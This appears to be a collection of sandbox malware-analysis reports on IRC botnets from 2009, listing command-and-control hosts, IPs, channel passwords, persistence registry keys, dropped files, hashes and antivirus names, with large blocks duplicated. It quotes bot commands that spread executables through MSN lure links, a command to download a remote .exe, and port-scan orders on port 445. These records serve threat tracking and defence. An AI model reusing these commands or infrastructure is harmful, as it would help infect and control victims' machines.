k2r.th3kings.net 208.96.62.2
* C&C Server: 208.96.62.2:27034
* Server Password:
* Username: XP-2677
* Nickname: [00|DEU|401746]
* Channel: #!!kk!!# (Password: aaaaaaa)
* Channeltopic: :.msn.msg Is this your Pictur? http://larvax.com/fotos.exe?=
Registry Changes by all processes
Create or Open
Changes HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce "wextract_cleanup0" = rundll32.exe C:\WINDOWS\system32\advpack.dll,DelNodeRunDLL32 "C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp\IXP000.TMP\"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "Java Update" = buthass.exe.exe
Reads HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\SystemShared "CUAS"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Language Hotkey"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Layout Hotkey"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF "EnableAnchorContext"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\IMM "Ime File"
HKEY_CURRENT_USER\Software\Microsoft\CTF "Disable Thread Input Manager"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager "PendingFileRenameOperations"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce "wextract_cleanup0"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Advanced INF Setup "AdvpackLogFile"
HKEY_LOCAL_MACHINE\SYSTEM\WPA\MediaCenter "Installed"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\SystemShared "CUAS"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Language Hotkey"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Layout Hotkey"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF "EnableAnchorContext"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\IMM "Ime File"
HKEY_CURRENT_USER\Software\Microsoft\CTF "Disable Thread Input Manager"
HKEY_LOCAL_MACHINE\SYSTEM\WPA\MediaCenter "Installed"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\SystemShared "CUAS"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Language Hotkey"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Layout Hotkey"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF "EnableAnchorContext"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\IMM "Ime File"
HKEY_CURRENT_USER\Software\Microsoft\CTF "Disable Thread Input Manager"
HKEY_LOCAL_MACHINE\SYSTEM\WPA\MediaCenter "Installed"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\SystemShared "CUAS"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Language Hotkey"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Layout Hotkey"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF "EnableAnchorContext"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\IMM "Ime File"
HKEY_CURRENT_USER\Software\Microsoft\CTF "Disable Thread Input Manager"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\SecurityService "DefaultAuthLevel"
File Changes by all processes
New Files C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp\IXP000.TMP\TMP4351$.TMP
C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp\IXP000.TMP\fotos.exe
C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp\IXP000.TMP\fotos.exe
\Device\Tcp
\Device\Ip
\Device\Ip
C:\WINDOWS\buthass.exe.exe
C:\WINDOWS\buthass.exe.exe
\Device\Tcp
\Device\Ip
\Device\Ip
\Device\RasAcd
Opened Files \\.\PIPE\lsarpc
C:\WINDOWS\AppPatch\sysmain.sdb
C:\WINDOWS\AppPatch\systest.sdb
\Device\NamedPipe\ShimViewer
C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp\IXP000.TMP\
C:\WINDOWS\AppPatch\sysmain.sdb
C:\WINDOWS\AppPatch\systest.sdb
\Device\NamedPipe\ShimViewer
C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp\IXP000.TMP\
\\.\Ip
C:\WINDOWS\AppPatch\sysmain.sdb
C:\WINDOWS\AppPatch\systest.sdb
\Device\NamedPipe\ShimViewer
C:\WINDOWS\
\\.\Ip
Deleted Files C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp\IXP000.TMP\fotos.exe
Chronological Order Get File Attributes: C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp\IXP000.TMP Flags: (SECURITY_ANONYMOUS)
Create File: C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp\IXP000.TMP\TMP4351$.TMP
Get File Attributes: C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp\IXP000.TMP\ Flags: (SECURITY_ANONYMOUS)
Open File: \\.\PIPE\lsarpc (OPEN_EXISTING)
Get File Attributes: C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp\IXP000.TMP\fotos.exe Flags: (SECURITY_ANONYMOUS)
Create File: C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp\IXP000.TMP\fotos.exe
Set File Time: C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp\IXP000.TMP\fotos.exe
Set File Attributes: C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp\IXP000.TMP\fotos.exe Flags: (FILE_ATTRIBUTE_ARCHIVE SECURITY_ANONYMOUS)
Get File Attributes: C:\WINDOWS\ Flags: (SECURITY_ANONYMOUS)
Open File: C:\WINDOWS\AppPatch\sysmain.sdb (OPEN_EXISTING)
Open File: C:\WINDOWS\AppPatch\systest.sdb (OPEN_EXISTING)
Open File: \Device\NamedPipe\ShimViewer (OPEN_EXISTING)
Open File: C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp\IXP000.TMP\ ()
Find File: C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp\IXP000.TMP\fotos.exe
Set File Attributes: C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp\IXP000.TMP\fotos.exe Flags: (FILE_ATTRIBUTE_NORMAL SECURITY_ANONYMOUS)
Delete File: C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp\IXP000.TMP\fotos.exe
Find File: C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp\IXP000.TMP\*
Create/Open File: C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp\IXP000.TMP\fotos.exe (OPEN_ALWAYS)
Open File: C:\WINDOWS\AppPatch\sysmain.sdb (OPEN_EXISTING)
Open File: C:\WINDOWS\AppPatch\systest.sdb (OPEN_EXISTING)
Open File: \Device\NamedPipe\ShimViewer (OPEN_EXISTING)
Open File: C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp\IXP000.TMP\ ()
Find File: C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp\IXP000.TMP\fotos.exe
Get File Attributes: C:\WINDOWS\system32\.HLP Flags: (SECURITY_ANONYMOUS)
Get File Attributes: C:\WINDOWS\Help\.HLP Flags: (SECURITY_ANONYMOUS)
Create/Open File: \Device\Tcp (OPEN_ALWAYS)
Create/Open File: \Device\Ip (OPEN_ALWAYS)
Create/Open File: \Device\Ip (OPEN_ALWAYS)
Open File: \\.\Ip (OPEN_EXISTING)
Get File Attributes: C:\WINDOWS\buthass.exe.exe Flags: (SECURITY_ANONYMOUS)
Copy File: C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp\IXP000.TMP\fotos.exe to C:\WINDOWS\buthass.exe.exe
Set File Attributes: C:\WINDOWS\buthass.exe.exe Flags: (FILE_ATTRIBUTE_HIDDEN FILE_ATTRIBUTE_READONLY FILE_ATTRIBUTE_SYSTEM SECURITY_ANONYMOUS)
Open File: C:\WINDOWS\AppPatch\sysmain.sdb (OPEN_EXISTING)
Open File: C:\WINDOWS\AppPatch\systest.sdb (OPEN_EXISTING)
Open File: \Device\NamedPipe\ShimViewer (OPEN_EXISTING)
Open File: C:\WINDOWS\ ()
Find File: C:\WINDOWS\buthass.exe.exe
Create/Open File: C:\WINDOWS\buthass.exe.exe (OPEN_ALWAYS)
Get File Attributes: C:\WINDOWS\system32\.HLP Flags: (SECURITY_ANONYMOUS)
Get File Attributes: C:\WINDOWS\Help\.HLP Flags: (SECURITY_ANONYMOUS)
Create/Open File: \Device\Tcp (OPEN_ALWAYS)
Create/Open File: \Device\Ip (OPEN_ALWAYS)
Create/Open File: \Device\Ip (OPEN_ALWAYS)
Open File: \\.\Ip (OPEN_EXISTING)
Create/Open File: \Device\RasAcd (OPEN_ALWAYS)
lundi 7 décembre 2009
bub.th3kings.net
bub.th3kings.net 217.148.32.202
* C&C Server: 217.148.32.202:27034
* Server Password:
* Username: XP-1568
* Nickname: [00|DEU|051548]
* Channel: #!!kk!!# (Password: aaaaaaa)
* Channeltopic: :.msn.msg Is this your Pictur? http://th3bestgirl.com/fotos.exe?=
* Private Message Deleted
o Value: :Cs!XP@yes.gov PRIVMSG #!!kk!!# :.login yeste
o Value: :Cs!XP@yes.gov PRIVMSG #!!kk!!# :.msn.msg Is this your Pictur? http://th3bestgirl.com/chek.exe?=
Registry Changes by all processes
Create or Open
Changes HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "Java Update" = fitnets.exe.exe
Reads HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\SystemShared "CUAS"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Language Hotkey"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Layout Hotkey"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF "EnableAnchorContext"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\IMM "Ime File"
HKEY_CURRENT_USER\Software\Microsoft\CTF "Disable Thread Input Manager"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\SystemShared "CUAS"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Language Hotkey"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Layout Hotkey"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF "EnableAnchorContext"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\IMM "Ime File"
HKEY_CURRENT_USER\Software\Microsoft\CTF "Disable Thread Input Manager"
HKEY_LOCAL_MACHINE\SYSTEM\WPA\MediaCenter "Installed"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\SystemShared "CUAS"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Language Hotkey"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Layout Hotkey"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF "EnableAnchorContext"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\IMM "Ime File"
HKEY_CURRENT_USER\Software\Microsoft\CTF "Disable Thread Input Manager"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\SecurityService "DefaultAuthLevel"
File Changes by all processes
New Files \Device\Tcp
\Device\Ip
\Device\Ip
C:\WINDOWS\fitnets.exe.exe
\Device\Tcp
\Device\Ip
\Device\Ip
\Device\RasAcd
Opened Files \\.\Ip
C:\WINDOWS\AppPatch\sysmain.sdb
C:\WINDOWS\AppPatch\systest.sdb
\Device\NamedPipe\ShimViewer
C:\WINDOWS\
\\.\Ip
Deleted Files
Chronological Order Get File Attributes: C:\WINDOWS\system32\.HLP Flags: (SECURITY_ANONYMOUS)
Get File Attributes: C:\WINDOWS\Help\.HLP Flags: (SECURITY_ANONYMOUS)
Create/Open File: \Device\Tcp (OPEN_ALWAYS)
Create/Open File: \Device\Ip (OPEN_ALWAYS)
Create/Open File: \Device\Ip (OPEN_ALWAYS)
Open File: \\.\Ip (OPEN_EXISTING)
Get File Attributes: C:\WINDOWS\fitnets.exe.exe Flags: (SECURITY_ANONYMOUS)
Copy File: c:\kar.EXE to C:\WINDOWS\fitnets.exe.exe
Set File Attributes: C:\WINDOWS\fitnets.exe.exe Flags: (FILE_ATTRIBUTE_HIDDEN FILE_ATTRIBUTE_READONLY FILE_ATTRIBUTE_SYSTEM SECURITY_ANONYMOUS)
Open File: C:\WINDOWS\AppPatch\sysmain.sdb (OPEN_EXISTING)
Open File: C:\WINDOWS\AppPatch\systest.sdb (OPEN_EXISTING)
Open File: \Device\NamedPipe\ShimViewer (OPEN_EXISTING)
Open File: C:\WINDOWS\ ()
Find File: C:\WINDOWS\fitnets.exe.exe
Get File Attributes: C:\WINDOWS\system32\.HLP Flags: (SECURITY_ANONYMOUS)
Get File Attributes: C:\WINDOWS\Help\.HLP Flags: (SECURITY_ANONYMOUS)
Create/Open File: \Device\Tcp (OPEN_ALWAYS)
Create/Open File: \Device\Ip (OPEN_ALWAYS)
Create/Open File: \Device\Ip (OPEN_ALWAYS)
Open File: \\.\Ip (OPEN_EXISTING)
Create/Open File: \Device\RasAcd (OPEN_ALWAYS)
* C&C Server: 217.148.32.202:27034
* Server Password:
* Username: XP-1568
* Nickname: [00|DEU|051548]
* Channel: #!!kk!!# (Password: aaaaaaa)
* Channeltopic: :.msn.msg Is this your Pictur? http://th3bestgirl.com/fotos.exe?=
* Private Message Deleted
o Value: :Cs!XP@yes.gov PRIVMSG #!!kk!!# :.login yeste
o Value: :Cs!XP@yes.gov PRIVMSG #!!kk!!# :.msn.msg Is this your Pictur? http://th3bestgirl.com/chek.exe?=
Registry Changes by all processes
Create or Open
Changes HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "Java Update" = fitnets.exe.exe
Reads HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\SystemShared "CUAS"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Language Hotkey"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Layout Hotkey"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF "EnableAnchorContext"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\IMM "Ime File"
HKEY_CURRENT_USER\Software\Microsoft\CTF "Disable Thread Input Manager"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\SystemShared "CUAS"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Language Hotkey"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Layout Hotkey"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF "EnableAnchorContext"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\IMM "Ime File"
HKEY_CURRENT_USER\Software\Microsoft\CTF "Disable Thread Input Manager"
HKEY_LOCAL_MACHINE\SYSTEM\WPA\MediaCenter "Installed"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\SystemShared "CUAS"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Language Hotkey"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Layout Hotkey"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF "EnableAnchorContext"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\IMM "Ime File"
HKEY_CURRENT_USER\Software\Microsoft\CTF "Disable Thread Input Manager"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\SecurityService "DefaultAuthLevel"
File Changes by all processes
New Files \Device\Tcp
\Device\Ip
\Device\Ip
C:\WINDOWS\fitnets.exe.exe
\Device\Tcp
\Device\Ip
\Device\Ip
\Device\RasAcd
Opened Files \\.\Ip
C:\WINDOWS\AppPatch\sysmain.sdb
C:\WINDOWS\AppPatch\systest.sdb
\Device\NamedPipe\ShimViewer
C:\WINDOWS\
\\.\Ip
Deleted Files
Chronological Order Get File Attributes: C:\WINDOWS\system32\.HLP Flags: (SECURITY_ANONYMOUS)
Get File Attributes: C:\WINDOWS\Help\.HLP Flags: (SECURITY_ANONYMOUS)
Create/Open File: \Device\Tcp (OPEN_ALWAYS)
Create/Open File: \Device\Ip (OPEN_ALWAYS)
Create/Open File: \Device\Ip (OPEN_ALWAYS)
Open File: \\.\Ip (OPEN_EXISTING)
Get File Attributes: C:\WINDOWS\fitnets.exe.exe Flags: (SECURITY_ANONYMOUS)
Copy File: c:\kar.EXE to C:\WINDOWS\fitnets.exe.exe
Set File Attributes: C:\WINDOWS\fitnets.exe.exe Flags: (FILE_ATTRIBUTE_HIDDEN FILE_ATTRIBUTE_READONLY FILE_ATTRIBUTE_SYSTEM SECURITY_ANONYMOUS)
Open File: C:\WINDOWS\AppPatch\sysmain.sdb (OPEN_EXISTING)
Open File: C:\WINDOWS\AppPatch\systest.sdb (OPEN_EXISTING)
Open File: \Device\NamedPipe\ShimViewer (OPEN_EXISTING)
Open File: C:\WINDOWS\ ()
Find File: C:\WINDOWS\fitnets.exe.exe
Get File Attributes: C:\WINDOWS\system32\.HLP Flags: (SECURITY_ANONYMOUS)
Get File Attributes: C:\WINDOWS\Help\.HLP Flags: (SECURITY_ANONYMOUS)
Create/Open File: \Device\Tcp (OPEN_ALWAYS)
Create/Open File: \Device\Ip (OPEN_ALWAYS)
Create/Open File: \Device\Ip (OPEN_ALWAYS)
Open File: \\.\Ip (OPEN_EXISTING)
Create/Open File: \Device\RasAcd (OPEN_ALWAYS)
CancerTreatmentCenter.org
Remote Host Port Number
199.71.215.177 51987
MODE pLagUe{USA}91936 -ix
JOIN #Plague
PONG CancerTreatmentCenter.org
PRIVMSG #Plague :
New PC Infected.
* The following port was open in the system:
Port Protocol Process
1052 TCP raidhost.exe (%Windir%\raidhost.exe)
Registry Modifications
* The newly created Registry Value is:
o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
+ raidhost = "raidhost.exe"
so that raidhost.exe runs every time Windows starts
Memory Modifications
* There was a new process created in the system:
Process Name Process Filename Main Module Size
raidhost.exe %Windir%\raidhost.exe 356 352 bytes
File System Modifications
* The following files were created in the system:
# Filename(s) File Size File Hash Alias
1 %Windir%\raidhost.exe
[file and pathname of the sample #1] 106 496 bytes MD5: 0x4CD2EE467C392D48581372387C7BD205
SHA-1: 0xADCD9AD5BC992F5E2617B97950A944A2120465E6 Worm.Win32.Carrier.hn [Kaspersky Lab]
2 %System%\YoItzVlad.tmp 5 bytes MD5: 0xD356C81C0BDF1FE2059EABDA720CA0D4
SHA-1: 0x6A09BBFD26586342F7A9F19B82EBBE5AAB023E06 (not available)
199.71.215.177 51987
MODE pLagUe{USA}91936 -ix
JOIN #Plague
PONG CancerTreatmentCenter.org
PRIVMSG #Plague :
New PC Infected.
* The following port was open in the system:
Port Protocol Process
1052 TCP raidhost.exe (%Windir%\raidhost.exe)
Registry Modifications
* The newly created Registry Value is:
o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
+ raidhost = "raidhost.exe"
so that raidhost.exe runs every time Windows starts
Memory Modifications
* There was a new process created in the system:
Process Name Process Filename Main Module Size
raidhost.exe %Windir%\raidhost.exe 356 352 bytes
File System Modifications
* The following files were created in the system:
# Filename(s) File Size File Hash Alias
1 %Windir%\raidhost.exe
[file and pathname of the sample #1] 106 496 bytes MD5: 0x4CD2EE467C392D48581372387C7BD205
SHA-1: 0xADCD9AD5BC992F5E2617B97950A944A2120465E6 Worm.Win32.Carrier.hn [Kaspersky Lab]
2 %System%\YoItzVlad.tmp 5 bytes MD5: 0xD356C81C0BDF1FE2059EABDA720CA0D4
SHA-1: 0x6A09BBFD26586342F7A9F19B82EBBE5AAB023E06 (not available)
leaf.rice.net
Remote Host Port Number
85.234.148.2 17402
Other details
* The following port was open in the system:
Port Protocol Process
1050 TCP lsass.exe (%Windir%\system\lsass.exe)
Registry Modifications
* The newly created Registry Value is:
o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
+ lsass = "lsass.exe"
so that lsass.exe runs every time Windows starts
Memory Modifications
* There was a new process created in the system:
Process Name Process Filename Main Module Size
lsass.exe %Windir%\system\lsass.exe 380 928 bytes
File System Modifications
* The following file was created in the system:
# Filename(s) File Size File Hash Alias
1 %Windir%\system\lsass.exe
[file and pathname of the sample #1] 80 384 bytes MD5: 0xAEAF1BC7032A1D16D04012123474405A
SHA-1: 0x3A5FF63343F0F291550A581896A816EB7690EC11 Net-Worm.Spybot [PCTools]
W32.Spybot.Worm [Symantec]
Backdoor.Win32.IRCBot.gen [Kaspersky Lab]
New Malware.b [McAfee]
Mal/Generic-A, Mal/SillyFDC-A, Mal/IRCBot-B [Sophos]
Backdoor:Win32/Gaertob.A [Microsoft]
Win32/IRCBot.worm.Gen [AhnLab]
85.234.148.2 17402
Other details
* The following port was open in the system:
Port Protocol Process
1050 TCP lsass.exe (%Windir%\system\lsass.exe)
Registry Modifications
* The newly created Registry Value is:
o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
+ lsass = "lsass.exe"
so that lsass.exe runs every time Windows starts
Memory Modifications
* There was a new process created in the system:
Process Name Process Filename Main Module Size
lsass.exe %Windir%\system\lsass.exe 380 928 bytes
File System Modifications
* The following file was created in the system:
# Filename(s) File Size File Hash Alias
1 %Windir%\system\lsass.exe
[file and pathname of the sample #1] 80 384 bytes MD5: 0xAEAF1BC7032A1D16D04012123474405A
SHA-1: 0x3A5FF63343F0F291550A581896A816EB7690EC11 Net-Worm.Spybot [PCTools]
W32.Spybot.Worm [Symantec]
Backdoor.Win32.IRCBot.gen [Kaspersky Lab]
New Malware.b [McAfee]
Mal/Generic-A, Mal/SillyFDC-A, Mal/IRCBot-B [Sophos]
Backdoor:Win32/Gaertob.A [Microsoft]
Win32/IRCBot.worm.Gen [AhnLab]
dimanche 6 décembre 2009
love.blowingbabes.net
* Unknown Connections
o Host By Name:
+ Requested Host: love.blowingbabes.net
+ Resulting Address: 192.168.1.1
o Connection Established: 0
o Socket: 0
* UDP Connections
o Send Datagram
+ Remote Address 192.168.1.1
+ Remote Port: 6061
+ Size: 7
o Receive Datagram
+ Local Port: 0
+ Remote Address 192.168.1.1
+ Remote Port: 6061
+ Size: 0
o Plain Communication Data
+ Send
# Dump Line:
* Off Set: $0000
* Dump: 61 C6 6A 5F E1 4F A3
* ASCII: a.j_.O.
o Transport Protocol: UDP
o Remote Address: 192.168.1.1
o Remote Port: 6061
o Protocol: Unknown
o Connection Established: 1
o Socket: 2520
# File System Changes...
* Open File:
o File: \\.\PIPE\lsarpc
o File Type: namedpipe
o Creation/Distribution: OPEN_EXISTING
o Desired Access: FILE_ANY_ACCESS
o Share Access: FILE_SHARE_READ FILE_SHARE_WRITE
o Flags: SECURITY_ANONYMOUS
* Create Open File
o File: C:\RECYCLER\S-1-5-21-8925014215-1967021999-496939561-3029\wmfcgr.exe
o File Type: file
o Source File Hash: 31866BAC00DB7BA8824F021A4E20FB006ADB5433
o Creation/Distribution: OPEN_ALWAYS
o Desired Access: FILE_ANY_ACCESS
o Share Access: FILE_SHARE_READ
o Flags: SECURITY_ANONYMOUS
o Stored as: ae8705a7b4bf8c13e5d8214d374e6c34.exe
o File: C:\RECYCLER\S-1-5-21-8925014215-1967021999-496939561-3029\Desktop.ini
o File Type: file
o Source File Hash: E783BDD23F0A976E00AE00AAE1FF460024487420
o Creation/Distribution: OPEN_ALWAYS
o Desired Access: FILE_ANY_ACCESS
o Share Access: FILE_SHARE_READ
o Flags: SECURITY_ANONYMOUS
o File: \Device\RasAcd
o File Type: file
o Source File Hash: hash_error
o Creation/Distribution: OPEN_ALWAYS
o Desired Access: FILE_ANY_ACCESS FILE_READ_ACCESS FILE_READ_DATA FILE_LIST_DIRECTORY FILE_WRITE_ACCESS FILE_WRITE_DATA FILE_ADD_FILE
o Share Access: FILE_SHARE_READ FILE_SHARE_WRITE
o Flags: FILE_ATTRIBUTE_NORMAL SECURITY_ANONYMOUS
* Copy File
o File: C:\12053046.exe
o File Type: file
o Source File Hash: 31866BAC00DB7BA8824F021A4E20FB006ADB5433
o Creation/Distribution: CREATE_ALWAYS
o Desired Access: FILE_ANY_ACCESS
o Flags: SECURITY_ANONYMOUS
o Stored as: ae8705a7b4bf8c13e5d8214d374e6c34.exe
o Destination File: C:\RECYCLER\S-1-5-21-8925014215-1967021999-496939561-3029\wmfcgr.exe
o Destination File Hash: 31866BAC00DB7BA8824F021A4E20FB006ADB5433
* Set File Attributes
o File: C:\RECYCLER\S-1-5-21-8925014215-1967021999-496939561-3029\wmfcgr.exe
o File Type: file
o Source File Hash: 31866BAC00DB7BA8824F021A4E20FB006ADB5433
o Desired Access: FILE_ANY_ACCESS
o Flags: FILE_ATTRIBUTE_HIDDEN FILE_ATTRIBUTE_READONLY FILE_ATTRIBUTE_SYSTEM SECURITY_ANONYMOUS
* Create Named Pipe
o File: \\.\pipe\trgnex
o File Type: namedpipe
o Desired Access: FILE_ANY_ACCESS
o Flags: SECURITY_ANONYMOUS
o Host By Name:
+ Requested Host: love.blowingbabes.net
+ Resulting Address: 192.168.1.1
o Connection Established: 0
o Socket: 0
* UDP Connections
o Send Datagram
+ Remote Address 192.168.1.1
+ Remote Port: 6061
+ Size: 7
o Receive Datagram
+ Local Port: 0
+ Remote Address 192.168.1.1
+ Remote Port: 6061
+ Size: 0
o Plain Communication Data
+ Send
# Dump Line:
* Off Set: $0000
* Dump: 61 C6 6A 5F E1 4F A3
* ASCII: a.j_.O.
o Transport Protocol: UDP
o Remote Address: 192.168.1.1
o Remote Port: 6061
o Protocol: Unknown
o Connection Established: 1
o Socket: 2520
# File System Changes...
* Open File:
o File: \\.\PIPE\lsarpc
o File Type: namedpipe
o Creation/Distribution: OPEN_EXISTING
o Desired Access: FILE_ANY_ACCESS
o Share Access: FILE_SHARE_READ FILE_SHARE_WRITE
o Flags: SECURITY_ANONYMOUS
* Create Open File
o File: C:\RECYCLER\S-1-5-21-8925014215-1967021999-496939561-3029\wmfcgr.exe
o File Type: file
o Source File Hash: 31866BAC00DB7BA8824F021A4E20FB006ADB5433
o Creation/Distribution: OPEN_ALWAYS
o Desired Access: FILE_ANY_ACCESS
o Share Access: FILE_SHARE_READ
o Flags: SECURITY_ANONYMOUS
o Stored as: ae8705a7b4bf8c13e5d8214d374e6c34.exe
o File: C:\RECYCLER\S-1-5-21-8925014215-1967021999-496939561-3029\Desktop.ini
o File Type: file
o Source File Hash: E783BDD23F0A976E00AE00AAE1FF460024487420
o Creation/Distribution: OPEN_ALWAYS
o Desired Access: FILE_ANY_ACCESS
o Share Access: FILE_SHARE_READ
o Flags: SECURITY_ANONYMOUS
o File: \Device\RasAcd
o File Type: file
o Source File Hash: hash_error
o Creation/Distribution: OPEN_ALWAYS
o Desired Access: FILE_ANY_ACCESS FILE_READ_ACCESS FILE_READ_DATA FILE_LIST_DIRECTORY FILE_WRITE_ACCESS FILE_WRITE_DATA FILE_ADD_FILE
o Share Access: FILE_SHARE_READ FILE_SHARE_WRITE
o Flags: FILE_ATTRIBUTE_NORMAL SECURITY_ANONYMOUS
* Copy File
o File: C:\12053046.exe
o File Type: file
o Source File Hash: 31866BAC00DB7BA8824F021A4E20FB006ADB5433
o Creation/Distribution: CREATE_ALWAYS
o Desired Access: FILE_ANY_ACCESS
o Flags: SECURITY_ANONYMOUS
o Stored as: ae8705a7b4bf8c13e5d8214d374e6c34.exe
o Destination File: C:\RECYCLER\S-1-5-21-8925014215-1967021999-496939561-3029\wmfcgr.exe
o Destination File Hash: 31866BAC00DB7BA8824F021A4E20FB006ADB5433
* Set File Attributes
o File: C:\RECYCLER\S-1-5-21-8925014215-1967021999-496939561-3029\wmfcgr.exe
o File Type: file
o Source File Hash: 31866BAC00DB7BA8824F021A4E20FB006ADB5433
o Desired Access: FILE_ANY_ACCESS
o Flags: FILE_ATTRIBUTE_HIDDEN FILE_ATTRIBUTE_READONLY FILE_ATTRIBUTE_SYSTEM SECURITY_ANONYMOUS
* Create Named Pipe
o File: \\.\pipe\trgnex
o File Type: namedpipe
o Desired Access: FILE_ANY_ACCESS
o Flags: SECURITY_ANONYMOUS
98.126.125.202(hub.us.com
Remote Host Port Number
112.78.219.146 80
222.76.217.154 80
98.126.125.202 47221
* The data identified by the following URLs was then requested from the remote web server:
o http://www.nippon.to/cgi-bin/prxjdg.cgi
o http://www.cooleasy.com/cgi-bin/prxjdg.cgi
PRIVMSG [N00_USA_XP_3663
@ :scan// Trying to get external IP.
@ :scan// Random Port Scan started on 192.168.x.x:445 with a delay of 5 seconds for 0 minutes using 25 threads.
@ :scan// Sequential Port Scan started on 192.168.0.0:445 with a delay of 5 seconds for 0 minutes using 25 threads.
@ :scan// Sequential Port Scan started on 192.168.187.0:445 with a delay of 5 seconds for 0 minutes using 25 threads.
MODE #x -ix
MODE #ma -ix
PRIVMSG #i :HTTP SET http://zonetech.info/68.exe
@ :scan// Random Port Scan started on 192.x.x.x:445 with a delay of 5 seconds for 0 minutes using 25 threads.
112.78.219.146 80
222.76.217.154 80
98.126.125.202 47221
* The data identified by the following URLs was then requested from the remote web server:
o http://www.nippon.to/cgi-bin/prxjdg.cgi
o http://www.cooleasy.com/cgi-bin/prxjdg.cgi
PRIVMSG [N00_USA_XP_3663
@ :scan// Trying to get external IP.
@ :scan// Random Port Scan started on 192.168.x.x:445 with a delay of 5 seconds for 0 minutes using 25 threads.
